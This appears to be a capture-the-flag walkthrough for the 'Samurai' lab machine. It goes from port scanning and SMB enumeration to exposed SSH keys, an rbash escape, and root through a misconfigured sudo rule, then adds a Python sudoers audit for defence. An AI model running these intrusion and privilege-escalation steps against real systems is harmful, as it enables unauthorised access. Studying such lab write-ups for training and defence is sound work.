# Samurai

## Nmap

```
sudo nmap 192.168.104.90 -p- -sS -sV

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           vsftpd 3.0.3
22/tcp   open  ssh           OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp   open  http          nginx 1.14.2
139/tcp  open  netbios-ssn   Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn   Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
7080/tcp open  ssl/empowerid LiteSpeed
7601/tcp open  http          Apache httpd 2.4.38 ((Debian))
8088/tcp open  http          LiteSpeed httpd
Service Info: Host: SEPPUKU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

Starting off on this machine, we find that port 80 is protected by an HTTP basic-auth login.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-f94b92f70d06af6e0197842531883f3572d324f6%2Fimage.png?alt=media)

I decided against brute-forcing it for the moment and moved straight on to the other ports. Looking at port 445 for SMB, I ran enum4linux against the target and discovered some user accounts.

```
enum4linux -u '' -p '' -a 192.168.104.90
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-65bff422744edef8f8eac78f4eaaad865c5b10ba%2Fimage.png?alt=media)

We have discovered the following users:

* seppuku
* samurai
* tanto

With no open shares on SMB, we move on to enumerating port 7601, which in the browser shows the following:

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-590d0a69b2bf47014eb85404f2a63f5ea1aabdee%2Fimage.png?alt=media)

Running `dirsearch.py` against this port reveals a `/keys/` directory.

```
python3 dirsearch.py -u http://192.168.104.90:7601 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 60 --full-url
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a3e10d29319cce5d0e6f279402770b3ef2937603%2Fimage.png?alt=media)

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2e97bf97f0e6071689dceba20ae28baec4a7c3f1%2Fimage.png?alt=media)

`private` and `private.bak` both contain RSA private keys. I copied the key to my desktop, renamed it to `id_rsa` and used `chmod` to set the permissions SSH requires.

```
chmod 600 id_rsa
```

Knowing the three users on the target machine, we can try the key against each of them over `SSH`. I was able to log in as the user tanto.

```
ssh -i id_rsa tanto@192.168.172.90
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-92391f887ac4961b1822f4828d1c5cabad0a455e%2Fimage.png?alt=media)

Once logged in as tanto, we see we are confined to `rbash` and unable to run some commands. I used the following command sequence to first escape `rbash`, then set a usable `PATH`, and finally upgrade to a proper interactive shell via Python.

```
# spawn an unrestricted shell from Python to leave rbash
python -c 'import os; os.system("/bin/sh")'
# rbash leaves PATH locked down, so restore a normal one
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
# upgrade to an interactive bash with a pty
python -c 'import pty; pty.spawn("/bin/bash")'
```

Once we can move around the box again, I moved into the seppuku user's home directory. The file `.passwd` is of interest and contains the password: `12345685213456!@!@A`

This password did not work for the user seppuku, but I was able to use `su` with it to log in as the user samurai.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9348340ef9ddba0f2f954c86f1471cf85e3062f0%2Fimage.png?alt=media)

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-779a4710d943cb8fa0553a3723a4000d62e1bd52%2Fimage.png?alt=media)

I then transferred linpeas over from the attacking machine, and it soon picked up an interesting sudo permission.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c310e3ce01b3dc327d0410d348ad3ac1b3e6514d%2Fimage.png?alt=media)

Open another tab and log in as tanto over `SSH` again. Then create the directory and file that the sudo rule lets samurai execute. Once the `.cgi_bin` directory and the `bin` file have been created, echo a bash shell into the file and `chmod` it to make it executable.

```
mkdir .cgi_bin
cd .cgi_bin
echo '/bin/bash' > bin
chmod 755 bin
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-15ab798795be833b2645ea47b8f2d6fea7c260c3%2Fimage.png?alt=media)

Then, in the other tab as samurai, execute the file with the following command to gain a root shell:

```
sudo /../../../../../../home/tanto/.cgi_bin/bin /tmp/*
```
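The root step works because the sudoers entry names a command path built from `..` components that resolves into a home directory tanto controls, and it also passes a wildcard argument. The audit below is an added example (not from the original write-up) that parses sudoers-style lines and flags exactly those weaknesses; the `SAMPLE_SUDOERS` text is constructed, and the samurai rule in it is my assumption of what the box's entry looks like based on the `sudo` command above.

```python
import os
import re

# Constructed sudoers text for demonstration. The samurai line is an assumed
# reconstruction of the rule behind `sudo /../../../../../../home/tanto/.cgi_bin/bin /tmp/*`.
SAMPLE_SUDOERS = """\
# constructed sample, not the box's real file
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
samurai ALL=(ALL) NOPASSWD: /../../../../../../home/tanto/.cgi_bin/bin /tmp/*
"""

# Locations an unprivileged user can normally write to; a sudo target that
# resolves here can be swapped for a shell by that user.
UNTRUSTED_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")

SPEC_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<hosts>[^=\s]+)=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)

def parse_sudoers(text):
    """Yield (user, runas, command_spec) for each user specification line."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and blanks
        if not line or line.startswith("Defaults"):
            continue
        m = SPEC_RE.match(line)
        if not m:
            continue
        for spec in m.group("cmds").split(","):
            yield m.group("user"), m.group("runas") or "root", spec.strip()

def audit_command(spec):
    """Return the findings for one command spec; an empty list means nothing flagged."""
    parts = re.sub(r"^(?:[A-Z]+:\s*)+", "", spec).split()  # strip NOPASSWD: etc.
    if not parts:
        return []
    cmd, args = parts[0], parts[1:]
    findings = []
    if ".." in cmd.split("/"):
        findings.append("traversal")                  # path relies on .. components
    resolved = os.path.normpath(cmd)                  # /../../home/x -> /home/x
    if resolved.startswith(UNTRUSTED_PREFIXES):
        findings.append("user-writable:" + resolved)  # target lives where a user can replace it
    if any("*" in a or "?" in a for a in args):
        findings.append("wildcard-args")              # glob lets the caller pick arguments
    return findings

def audit_sudoers(text):
    """Map each flagged (user, runas, spec) to its findings; clean entries are omitted."""
    return {k: f for k in parse_sudoers(text) if (f := audit_command(k[2]))}
```

Running `audit_sudoers(SAMPLE_SUDOERS)` reports only the samurai rule, with all three findings; the same check against `/etc/sudoers` and `/etc/sudoers.d/*` is a quick way to catch this pattern before a tester does.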

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-065b28aa101124f0b5b8dcb5fc7d8d9d177693d7%2Fimage.png?alt=media)
